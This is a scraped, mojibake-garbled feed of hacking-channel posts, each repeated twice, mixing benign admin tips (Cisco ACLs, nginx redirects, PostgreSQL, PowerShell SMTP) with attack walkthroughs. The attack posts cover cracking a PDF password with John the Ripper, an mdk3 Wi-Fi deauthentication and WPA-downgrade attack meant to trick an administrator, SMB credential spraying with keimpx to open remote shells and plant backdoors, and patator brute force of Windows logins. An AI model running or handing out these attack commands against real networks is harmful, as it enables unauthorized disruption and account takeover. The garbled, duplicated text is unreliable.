β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Creating Accessory Lists for Cisco Routers :
> t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Configure a simple sheet (identification up to 100):
Create sheet 10 and deny any connections with the address 192.168.0.2 in it
R1 (config) # access-list 10 deny 192.168.0.2
2) We connect the sheet with the input interface:
R1 (config) #interface fastEthernet 1/0
R1 (config-if) #ip access-group 10 in
R1 (config-if) #exit
3) Delete a sheet as follows (you cannot change a simple sheet):
Once you enter the interface, enter
R1 (config-if) #no ip access-group in
4) Configure a complex sheet (identification greater than 100):
Create
R2 (config) #ip access-list extended 110
5) We go to the sheet and configure it (disable icmp between hosts):
R2 (config) #ip access-list extended 110
R2 (config-ext-nacl) #deny icmp host 192.168.0.1 host 192.168.0.2
R2 (config-ext-nacl) #exit
6) We will connect with the interface
R2 (config) #interface fastEthernet 1/0
R2 (config-if) #ip access-group 110 in
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Creating Accessory Lists for Cisco Routers :
> t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Configure a simple sheet (identification up to 100):
Create sheet 10 and deny any connections with the address 192.168.0.2 in it
R1 (config) # access-list 10 deny 192.168.0.2
2) We connect the sheet with the input interface:
R1 (config) #interface fastEthernet 1/0
R1 (config-if) #ip access-group 10 in
R1 (config-if) #exit
3) Delete a sheet as follows (you cannot change a simple sheet):
Once you enter the interface, enter
R1 (config-if) #no ip access-group in
4) Configure a complex sheet (identification greater than 100):
Create
R2 (config) #ip access-list extended 110
5) We go to the sheet and configure it (disable icmp between hosts):
R2 (config) #ip access-list extended 110
R2 (config-ext-nacl) #deny icmp host 192.168.0.1 host 192.168.0.2
R2 (config-ext-nacl) #exit
6) We will connect with the interface
R2 (config) #interface fastEthernet 1/0
R2 (config-if) #ip access-group 110 in
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hidden redirect, rewrite and reverse proxy server in nginx to a third-party server :
fb.com/UndercodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Redirect, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# return 301 $ scheme: // test-on-mongo: 5001 $ request_uri;
#}
2) Rewrite, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# rewrite ^ (. *) $ $ scheme: // test-on-mongo: 5001 $ 1 permanent;
# return 403;
#}
3) Rewrite, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# location / {
# if ($ http_host ~ "^ test-on-mongo: 3001") {
# rewrite ^ / (. *) http: // test-on-mongo: 5001 redirect;
#}
#}
#}
4) A third-party web server is running on port 3001, it was previously on port 5001
5) From the old link 5001, nginx redirects to port 80, and then to 3001
# Made to bite a port in url
server {
listen 80;
listen [::]: 80;
server_name test-on-mongo;
location / {
proxy_pass http: // test-on-mongo: 3001;
}
}
server {
listen 5001;
listen [::]: 5001;
server_name test-on-mongo;
return 301 $ scheme: // test-on-mongo $ request_uri;
}
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hidden redirect, rewrite and reverse proxy server in nginx to a third-party server :
fb.com/UndercodeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Redirect, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# return 301 $ scheme: // test-on-mongo: 5001 $ request_uri;
#}
2) Rewrite, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# rewrite ^ (. *) $ $ scheme: // test-on-mongo: 5001 $ 1 permanent;
# return 403;
#}
3) Rewrite, rewrites the address in the browser, defines a new (rewritten)
#server {
# listen 3001;
# server_name test-on-mongo;
# location / {
# if ($ http_host ~ "^ test-on-mongo: 3001") {
# rewrite ^ / (. *) http: // test-on-mongo: 5001 redirect;
#}
#}
#}
4) A third-party web server is running on port 3001, it was previously on port 5001
5) From the old link 5001, nginx redirects to port 80, and then to 3001
# Made to bite a port in url
server {
listen 80;
listen [::]: 80;
server_name test-on-mongo;
location / {
proxy_pass http: // test-on-mongo: 3001;
}
}
server {
listen 5001;
listen [::]: 5001;
server_name test-on-mongo;
return 301 $ scheme: // test-on-mongo $ request_uri;
}
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Facebook
UndercOde Testing Company
UndercOde Testing Company. 94 likes Β· 6 talking about this. Local service
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Official Microsoft GitHub Repository containing code samples for SQL Server for any Linux Server/ Windows or Win server
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone -n https://github.com/Microsoft/sql-server-samples
2) cd sql-server-samples
3) git config core.sparsecheckout true
4 )echo samples/features/*| out-file -append -encoding ascii .git/info/sparse-checkout
5) echo samples/demos/*| out-file -append -encoding ascii .git/info/sparse-checkout
6) git checkout
π¦Extra Note Recommended by UndercOde:
> Sparse checkouts enable you to work on a subset of the repository. Itβs worth the effort to set up sparse checkouts on large repositories, everything is much faster!
> I struggled with setting it up on windows getting a lot of βerror: Sparse checkout leaves no entry on the working directoryβ. After a bit of research, I found the following steps were minimal and had consistently good results for me β YMMV.
> The most important point is this β DO NOT USE POWERSHELL/CMD FOR THESE STEPS β use a git bash prompt. This is because otherwise the echo command produces a UNICODE file with a BOM marker. The file MUST be an ANSI formatted file with UNIX style line endings for git to parse it correctly. This is the most likely cause of βerror: Sparse checkout leaves no entry on the working directoryβ errors.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Official Microsoft GitHub Repository containing code samples for SQL Server for any Linux Server/ Windows or Win server
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone -n https://github.com/Microsoft/sql-server-samples
2) cd sql-server-samples
3) git config core.sparsecheckout true
4 )echo samples/features/*| out-file -append -encoding ascii .git/info/sparse-checkout
5) echo samples/demos/*| out-file -append -encoding ascii .git/info/sparse-checkout
6) git checkout
π¦Extra Note Recommended by UndercOde:
> Sparse checkouts enable you to work on a subset of the repository. Itβs worth the effort to set up sparse checkouts on large repositories, everything is much faster!
> I struggled with setting it up on windows getting a lot of βerror: Sparse checkout leaves no entry on the working directoryβ. After a bit of research, I found the following steps were minimal and had consistently good results for me β YMMV.
> The most important point is this β DO NOT USE POWERSHELL/CMD FOR THESE STEPS β use a git bash prompt. This is because otherwise the echo command produces a UNICODE file with a BOM marker. The file MUST be an ANSI formatted file with UNIX style line endings for git to parse it correctly. This is the most likely cause of βerror: Sparse checkout leaves no entry on the working directoryβ errors.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Crack Pdf PassWord Guide Tested :
t.me/iOsDeveloppers
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/magnumripper/JohnTheRipper.git
2) cd ./JohnTheRipper/src
3) sudo apt-get update
4) sudo apt-get install libssl-dev
5) ./configure && make
6) cd ..
7) cd ./run
8) ls
π¦ Generate PDF hash file :
type in term:
> pdf2john.pl /root/Desktop/pdf_exampleprotected.pdf > /root/Desktop/pdf.hash
π¦Brute Force with John:
Now :
>john exampleprotected_pdf.hash
> john --wordlist=password.lst exampleprotected_pdf.hash
π¦Tested by UndercOde on:
> Kali
> Parrot
> debian
> Ubanto
E N J O Y
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Crack Pdf PassWord Guide Tested :
t.me/iOsDeveloppers
π¦πβπππΈπππππΈπππβ & βπβ:
1) git clone https://github.com/magnumripper/JohnTheRipper.git
2) cd ./JohnTheRipper/src
3) sudo apt-get update
4) sudo apt-get install libssl-dev
5) ./configure && make
6) cd ..
7) cd ./run
8) ls
π¦ Generate PDF hash file :
type in term:
> pdf2john.pl /root/Desktop/pdf_exampleprotected.pdf > /root/Desktop/pdf.hash
π¦Brute Force with John:
Now :
>john exampleprotected_pdf.hash
> john --wordlist=password.lst exampleprotected_pdf.hash
π¦Tested by UndercOde on:
> Kali
> Parrot
> debian
> Ubanto
E N J O Y
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Powershell: send SMTP email with authorization :
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
Now Powershell code , I wanted to check if the services are running, if someone of interest is stopped, then an SMTP notification is sent
π¦ Sender and Recipient Info
$MailFrom = "sender@senderdomain.com"
$MailTo = "recipient@recipientdomain.com"
# Sender Credentials
$Username = "SomeUsername@SomeDomain.com"
$Password = "SomePassword"
# Server Info
$SmtpServer = "smtp.domain.com"
$SmtpPort = "2525"
# Message stuff
$MessageSubject = "Live your best life now"
$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @'
<!DOCTYPE html>
<html>
<head>
</head>
<body>
This is a test message to trigger an ETR.
</body>
</html>
'@
π¦Construct the SMTP client object, credentials, and send
$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = New-Object System.Net.NetworkCredential($Username,$Password)
$Smtp.Send($Message)
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Powershell: send SMTP email with authorization :
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
Now Powershell code , I wanted to check if the services are running, if someone of interest is stopped, then an SMTP notification is sent
π¦ Sender and Recipient Info
$MailFrom = "sender@senderdomain.com"
$MailTo = "recipient@recipientdomain.com"
# Sender Credentials
$Username = "SomeUsername@SomeDomain.com"
$Password = "SomePassword"
# Server Info
$SmtpServer = "smtp.domain.com"
$SmtpPort = "2525"
# Message stuff
$MessageSubject = "Live your best life now"
$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @'
<!DOCTYPE html>
<html>
<head>
</head>
<body>
This is a test message to trigger an ETR.
</body>
</html>
'@
π¦Construct the SMTP client object, credentials, and send
$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = New-Object System.Net.NetworkCredential($Username,$Password)
$Smtp.Send($Message)
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PostgreSQL guide bu utc
The scheme of the PostgreSQL application is as follows:
t.me/UndercOdeTesting
1) The " POSTMASTER " process on the server receives a connection request
2) Upon successful completion of the check, POSTMASTER creates its copy
3) Next, the interaction with the client database is already through a copy
π¦After installation (Configuring a database cluster)
On Windows, the installation package most likely will write everything automatically to start the cluster, depending on the specified directory, but you can configure the cluster using the utilities below initdb and pg_ctl , they will be in the bin directory, for example - D: \ Postgres \ bin
In this case, it is a set of databases that will be managed by a single server instance.
π¦ A single PostgreSQL instance can start and monitor a set of databases that are isolated from each other but served through the same TCP / IP or UNIX socket
You can use the option to create a cluster with:
initdb - creates a new PostgreSQL database cluster
The syntax is initdb [option ...] [βpgdata | -D] directory
π¦ The desired location of the database cluster is indicated by the -D option:
> sudo postgres
> initdb -D / usr / local / pgsql / data
Or so:
$ sudo postgres
$ pg_ctl -D / usr / local / pgsql / data initdb
π¦ After that, you can try to start the server - sudo service postgresql start
Or there are options
Run postmaster in active mode:
$ postmaster - D / usr / local / pgsql / data
Running in the background using pg_ctl:
$ pg_ctl - D / usr / local / pgsql / data - 1 /tmp/postgresql.log start
π¦ Examples of pg_ctl actions :
Server start:
$ pg_ctl start
Server Stop:
$ pg_ctl stop
Server restart:
$ pg_ctl restart
Server Status:
$ pg_ctl status
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦PostgreSQL guide bu utc
The scheme of the PostgreSQL application is as follows:
t.me/UndercOdeTesting
1) The " POSTMASTER " process on the server receives a connection request
2) Upon successful completion of the check, POSTMASTER creates its copy
3) Next, the interaction with the client database is already through a copy
π¦After installation (Configuring a database cluster)
On Windows, the installation package most likely will write everything automatically to start the cluster, depending on the specified directory, but you can configure the cluster using the utilities below initdb and pg_ctl , they will be in the bin directory, for example - D: \ Postgres \ bin
In this case, it is a set of databases that will be managed by a single server instance.
π¦ A single PostgreSQL instance can start and monitor a set of databases that are isolated from each other but served through the same TCP / IP or UNIX socket
You can use the option to create a cluster with:
initdb - creates a new PostgreSQL database cluster
The syntax is initdb [option ...] [βpgdata | -D] directory
π¦ The desired location of the database cluster is indicated by the -D option:
> sudo postgres
> initdb -D / usr / local / pgsql / data
Or so:
$ sudo postgres
$ pg_ctl -D / usr / local / pgsql / data initdb
π¦ After that, you can try to start the server - sudo service postgresql start
Or there are options
Run postmaster in active mode:
$ postmaster - D / usr / local / pgsql / data
Running in the background using pg_ctl:
$ pg_ctl - D / usr / local / pgsql / data - 1 /tmp/postgresql.log start
π¦ Examples of pg_ctl actions :
Server start:
$ pg_ctl start
Server Stop:
$ pg_ctl stop
Server restart:
$ pg_ctl restart
Server Status:
$ pg_ctl status
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Psql utility :
t.me/UndercodeTesting
In the standard delivery with the server with the postgresql-client package for administration, the psql utility is used , I will give several examples of its functionality (examples for Windows and Linux are similar)
1) On Linux - su - postgres, Windows - cmd - psql
psql --help - help
2) Some utility arguments:
psql -l - list the databases
psql -d database - connect to the database with the name " database "
psql -f script .sql - execute the SQL script " script .sql"
psql -d test -H -c "SELECT * FROM students " -o D: \ Postgres \ f .html - output to file
3) Listing configuration files:
psql> SELECT name, setting FROM pg_settings WHERE category = 'File Locations';
4) Listing Active Sessions:
psql> SELECT * FROM pg_stat_activity;
5) Kill Session:
- Learn id session from
6) SELECT datname as database,
pid
7) usename as username,
application_name as application,
client_addr as client_address,
query
8) FROM pg_stat_activity;
- Specify the session id and database
SELECT pg_terminate_backend ( session id )
FROM pg_stat_activity
WHERE datname = 'DB';
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Psql utility :
t.me/UndercodeTesting
In the standard delivery with the server with the postgresql-client package for administration, the psql utility is used , I will give several examples of its functionality (examples for Windows and Linux are similar)
1) On Linux - su - postgres, Windows - cmd - psql
psql --help - help
2) Some utility arguments:
psql -l - list the databases
psql -d database - connect to the database with the name " database "
psql -f script .sql - execute the SQL script " script .sql"
psql -d test -H -c "SELECT * FROM students " -o D: \ Postgres \ f .html - output to file
3) Listing configuration files:
psql> SELECT name, setting FROM pg_settings WHERE category = 'File Locations';
4) Listing Active Sessions:
psql> SELECT * FROM pg_stat_activity;
5) Kill Session:
- Learn id session from
6) SELECT datname as database,
pid
7) usename as username,
application_name as application,
client_addr as client_address,
query
8) FROM pg_stat_activity;
- Specify the session id and database
SELECT pg_terminate_backend ( session id )
FROM pg_stat_activity
WHERE datname = 'DB';
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some BlackArch Program examples2019-2020
t.me/undercOdeTesting
π¦ ππΌππ πππΈβπ :
1) blackarch-code-audit
Packages for auditing existing vulnerability analysis code.
Examples: flawfinder, pscan
2) blackarch-cracker
Packages used to crack cryptographic functions, such as passwords.
Examples: hashcat, john, crunch
3) blackarch-crypto
Packages that work with cryptography, with the exception of hacking.
Examples: ciphertest, xortool, sbd
4) blackarch-cryptography
Security audit tools for cryptographic algorithms and technologies.
Examples: pyssltest, skul
5) blackarch-database
Packages that at some level include exploit databases.
Examples: metacoretex, blindsql
6) blackarch-debugger
Packages that allow the user to see what a particular program "does" in real time.
Examples: radare2, shellnoob
7) blackarch-decompiler
Packages that try to convert compiled programs to source code.
Examples: flasm, jd-gui
8) blackarch-defensive
Packages that are used to protect against malware and attacks from other users.
Examples: arpon, chkrootkit, sniffjoke
9) blackarch-disassembler
Like blackarch-decompiler and probably a lot of programs will fall into both categories, however, these packages produce assembler code in the output, rather than the raw source code.
Examples: inguma, radare2
10) blackarch-dos
Packets that use DoS attacks (Denial of Service).
Examples: 42zip, nkiller2
11) blackarch-drone
Packages that are used to control physically engineered drones.
Examples: meshdeck, skyjack
12) blackarch-exploitation
Packages that take advantage of exploits in other programs or services.
Examples: armitage, metasploit, zarp
& more...
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Some BlackArch Program examples2019-2020
t.me/undercOdeTesting
π¦ ππΌππ πππΈβπ :
1) blackarch-code-audit
Packages for auditing existing vulnerability analysis code.
Examples: flawfinder, pscan
2) blackarch-cracker
Packages used to crack cryptographic functions, such as passwords.
Examples: hashcat, john, crunch
3) blackarch-crypto
Packages that work with cryptography, with the exception of hacking.
Examples: ciphertest, xortool, sbd
4) blackarch-cryptography
Security audit tools for cryptographic algorithms and technologies.
Examples: pyssltest, skul
5) blackarch-database
Packages that at some level include exploit databases.
Examples: metacoretex, blindsql
6) blackarch-debugger
Packages that allow the user to see what a particular program "does" in real time.
Examples: radare2, shellnoob
7) blackarch-decompiler
Packages that try to convert compiled programs to source code.
Examples: flasm, jd-gui
8) blackarch-defensive
Packages that are used to protect against malware and attacks from other users.
Examples: arpon, chkrootkit, sniffjoke
9) blackarch-disassembler
Like blackarch-decompiler and probably a lot of programs will fall into both categories, however, these packages produce assembler code in the output, rather than the raw source code.
Examples: inguma, radare2
10) blackarch-dos
Packets that use DoS attacks (Denial of Service).
Examples: 42zip, nkiller2
11) blackarch-drone
Packages that are used to control physically engineered drones.
Examples: meshdeck, skyjack
12) blackarch-exploitation
Packages that take advantage of exploits in other programs or services.
Examples: armitage, metasploit, zarp
& more...
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
UNDERCODE TESTING OFFICIAL
π¦ WELCOME TO UNDERCODE TESTING FOR LEARN HACKING & PROGRAMMING & MORE... @UndercodeTesting @DailyCve @iUndercode
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
ππΎππππ±π ΄
youtube.com/c/UNDERCODE
π ΅π°π ²π ΄π±πΎπΎπ Ί
Fb.com/UNDERCODETESTING
π Έπ ½πππ°π Άππ°π Ό
INSTAGRAM.com/UNDERCODETESTING
πππ Έπππ ΄π
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WIFI HACKING : WPA downgrade test:
The WPA downgrade test is a test mode indicated by the letter g . This mode has only one option -t <bssid> , after which you need to specify the target network.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> The essence of this attack is that mdk3 deauthenticates Stations and APs by sending encrypted WPA packets. With this test, you can check whether the system administrator will try to set the network settings to WEP or disable encryption. mdk3 will allow clients to work with WEP without encryption, so this attack is carried out in the hope that the system administrator will just think that "WPA is broken." Therefore, this attack is designed for an advanced user who will think of changing the settings of the router and be able to do it. This attack refers to social engineering, to increase the likelihood of a successful outcome, it can be combined with other social engineering techniques.
1) look at the available networks:
> sudo airodump-ng wlan0
2) Suppose we are interested in a network called dlink, it uses WPA2 encryption and its BSSID 00: 1E: 58: C6: AC: FB, we also note that the AP works on channel 6.
3) We need to transfer our wireless card to the same channel that the AP works:
> sudo iw wlan0 set channel 6
4) We launch an attack that disconnects all clients from this network and prevents them from reconnecting until encryption is changed to WEP or removed at all:
> sudo mdk3 wlan0 g -t 00:1E:58:C6:AC:FB
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WIFI HACKING : WPA downgrade test:
The WPA downgrade test is a test mode indicated by the letter g . This mode has only one option -t <bssid> , after which you need to specify the target network.
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
> The essence of this attack is that mdk3 deauthenticates Stations and APs by sending encrypted WPA packets. With this test, you can check whether the system administrator will try to set the network settings to WEP or disable encryption. mdk3 will allow clients to work with WEP without encryption, so this attack is carried out in the hope that the system administrator will just think that "WPA is broken." Therefore, this attack is designed for an advanced user who will think of changing the settings of the router and be able to do it. This attack refers to social engineering, to increase the likelihood of a successful outcome, it can be combined with other social engineering techniques.
1) look at the available networks:
> sudo airodump-ng wlan0
2) Suppose we are interested in a network called dlink, it uses WPA2 encryption and its BSSID 00: 1E: 58: C6: AC: FB, we also note that the AP works on channel 6.
3) We need to transfer our wireless card to the same channel that the AP works:
> sudo iw wlan0 set channel 6
4) We launch an attack that disconnects all clients from this network and prevents them from reconnecting until encryption is changed to WEP or removed at all:
> sudo mdk3 wlan0 g -t 00:1E:58:C6:AC:FB
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is mdk3 and what can do ?
> mdk3 is a multifunctional program whose main goal is to show the weak points of Wi-Fi networks. The mdk3 utility can be used to suppress Wi-Fi, deauthenticate clients, to confuse wireless network monitors or to confuse intruders who want to attack your wireless network, as well as to perform an attack aimed at lowering the encryption algorithm from WPA to a weaker one or refusing to use it encryption. Those. it can be seen that the program is very versatile.
t.me/UndercodeTesting
π¦ Now Using mdk3 :
The program starts as follows:
> mdk3 - h
π¦in usage :
<interface> is the name of your wireless interface,
<test mode> is one of the programβs functions, for example, stress testing, flood, etc. It is indicated by a small letter without a dash.
mdk3 does not know how to transfer cards to monitor mode and does not switch the interface to the desired channel. Because of this, most often there are problems when mdk3 does not work. These are the most common usage errors - before you start an attack, you need to switch to the desired channel yourself.
π¦ Stop NetworkManager so that it does not bother us:
> sudo systemctl stop NetworkManager
Putting the wireless interface in monitor monitor mode
> sudo ip link set wlan0 down<font></font>
>sudo iw wlan0 set monitor control<font></font>
> sudo ip link set wlan0 up
Note that the interface name is still wlan0 , although it is now in monitor mode
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is mdk3 and what can do ?
> mdk3 is a multifunctional program whose main goal is to show the weak points of Wi-Fi networks. The mdk3 utility can be used to suppress Wi-Fi, deauthenticate clients, to confuse wireless network monitors or to confuse intruders who want to attack your wireless network, as well as to perform an attack aimed at lowering the encryption algorithm from WPA to a weaker one or refusing to use it encryption. Those. it can be seen that the program is very versatile.
t.me/UndercodeTesting
π¦ Now Using mdk3 :
The program starts as follows:
> mdk3 - h
π¦in usage :
<interface> is the name of your wireless interface,
<test mode> is one of the programβs functions, for example, stress testing, flood, etc. It is indicated by a small letter without a dash.
mdk3 does not know how to transfer cards to monitor mode and does not switch the interface to the desired channel. Because of this, most often there are problems when mdk3 does not work. These are the most common usage errors - before you start an attack, you need to switch to the desired channel yourself.
π¦ Stop NetworkManager so that it does not bother us:
> sudo systemctl stop NetworkManager
Putting the wireless interface in monitor monitor mode
> sudo ip link set wlan0 down<font></font>
>sudo iw wlan0 set monitor control<font></font>
> sudo ip link set wlan0 up
Note that the interface name is still wlan0 , although it is now in monitor mode
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦keimpx 2020 tool :
keimpx is an open source tool for quickly checking credentials over the network via SMB. Credentials can be:
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) The combination of user / password in clear text.
> User / NTLM hash combination.
> NTLM login / user session token combination.
π¦ If after this phase of the attack any valid credentials were found on the network, the program will ask the user to select a host to connect to and which valid credentials to use. They will be used to open the SMB interactive shell where the user can:
1) Launch an interactive command line.
2) Perform actions in remote SMB network folders: display a list of files and folders, upload, download files, create, delete files, etc.
Deploy and collapse your own services, for example, a backdoor listening on a TCP port for incoming connections.
3) Show details about users, domains, and password policies.
Scan the subnet (-t 192.168.0.0/24) by checking the validity of the username (-U Alexey) and password (-P qweqwe123) for all hosts with network folders :
> git clone https://github.com/nccgroup/keimpx
> cd keimpx
> python3 ./keimpx.py -t 192.168.0.0/24 -U Alexey -P qweqwe123
Connect to the remote host (-t 192.168.0.101) using the username (-U U ndercOde) and password (-P qweqwe123) :
> python3 ./keimpx.py -t 192.168.0.101 -U Undercode -P qweqwe123
As a result, the specified credentials will be checked for correctness. If they are correct, you will be prompted to connect and open an interactive shell to interact with the remote system
π¦TESTED
E N J O Y
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦keimpx 2020 tool :
keimpx is an open source tool for quickly checking credentials over the network via SMB. Credentials can be:
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ:
1) The combination of user / password in clear text.
> User / NTLM hash combination.
> NTLM login / user session token combination.
π¦ If after this phase of the attack any valid credentials were found on the network, the program will ask the user to select a host to connect to and which valid credentials to use. They will be used to open the SMB interactive shell where the user can:
1) Launch an interactive command line.
2) Perform actions in remote SMB network folders: display a list of files and folders, upload, download files, create, delete files, etc.
Deploy and collapse your own services, for example, a backdoor listening on a TCP port for incoming connections.
3) Show details about users, domains, and password policies.
Scan the subnet (-t 192.168.0.0/24) by checking the validity of the username (-U Alexey) and password (-P qweqwe123) for all hosts with network folders :
> git clone https://github.com/nccgroup/keimpx
> cd keimpx
> python3 ./keimpx.py -t 192.168.0.0/24 -U Alexey -P qweqwe123
Connect to the remote host (-t 192.168.0.101) using the username (-U U ndercOde) and password (-P qweqwe123) :
> python3 ./keimpx.py -t 192.168.0.101 -U Undercode -P qweqwe123
As a result, the specified credentials will be checked for correctness. If they are correct, you will be prompted to connect and open an interactive shell to interact with the remote system
π¦TESTED
E N J O Y
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Brute-force SMB public folder user credentials
patator
T.me/iOsDeveloppers
π¦πβπππΈπππππΈπππβ & βπβ:
1) The patator program is designed for brute-force credentials and is one of the most flexible to configure.
2) For brute-force online login and user password for accessing the shared folder (and therefore Windows user credentials), run a command of the form:
>clone https://github.com/lanjelot/patator
./patator.py smb_login host = 192.168.0.101 user = FILE0 password = FILE1 0 = / root / logins.txt 1 = / root / passwords.txt -x ignore: fgrep = 'STATUS_LOGON_FAILURE'
π¦In this command:
./patator.py - the name of the executable file, depending on the installation method it may be patator
smb_login - SMB brute force module
host = 192.168.0.101 - IP address of the computer on which the password is selected. You can specify a file with hosts (more precisely, the file placeholder number)
user = FILE0 - username for brute force. Instead of a name, a placeholder with a pointer to file number 0
password = FILE1 - password for brute force. Instead of a single password, a placeholder is written with a pointer to the file number 1
0 = / root / logins.txt - path to file number 0
1 = / root / passwords.txt - path to file number 1
-x ignore: fgrep = 'STATUS_LOGON_FAILURE' - do not display attempts, in response to which the line STATUS_LOGON_FAILURE was received
π¦That is, two pairs of credentials were found as example:
undercodeOverlord: 1234
undercode2: qweqwe123
Obtained computer name and version of Windows:
\ UndercOdeTesting (Windows 10.0 Build 18362)
Another account was found for which the message STATUS_ACCOUNT_RESTRICTION was received:
mial:
The message said that there are account restrictions for the mial user. The reason is that the username and password are correct (empty password), but users without a password are not allowed on this computer.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Brute-force SMB public folder user credentials
patator
T.me/iOsDeveloppers
π¦πβπππΈπππππΈπππβ & βπβ:
1) The patator program is designed for brute-force credentials and is one of the most flexible to configure.
2) For brute-force online login and user password for accessing the shared folder (and therefore Windows user credentials), run a command of the form:
>clone https://github.com/lanjelot/patator
./patator.py smb_login host = 192.168.0.101 user = FILE0 password = FILE1 0 = / root / logins.txt 1 = / root / passwords.txt -x ignore: fgrep = 'STATUS_LOGON_FAILURE'
π¦In this command:
./patator.py - the name of the executable file, depending on the installation method it may be patator
smb_login - SMB brute force module
host = 192.168.0.101 - IP address of the computer on which the password is selected. You can specify a file with hosts (more precisely, the file placeholder number)
user = FILE0 - username for brute force. Instead of a name, a placeholder with a pointer to file number 0
password = FILE1 - password for brute force. Instead of a single password, a placeholder is written with a pointer to the file number 1
0 = / root / logins.txt - path to file number 0
1 = / root / passwords.txt - path to file number 1
-x ignore: fgrep = 'STATUS_LOGON_FAILURE' - do not display attempts, in response to which the line STATUS_LOGON_FAILURE was received
π¦That is, two pairs of credentials were found as example:
undercodeOverlord: 1234
undercode2: qweqwe123
Obtained computer name and version of Windows:
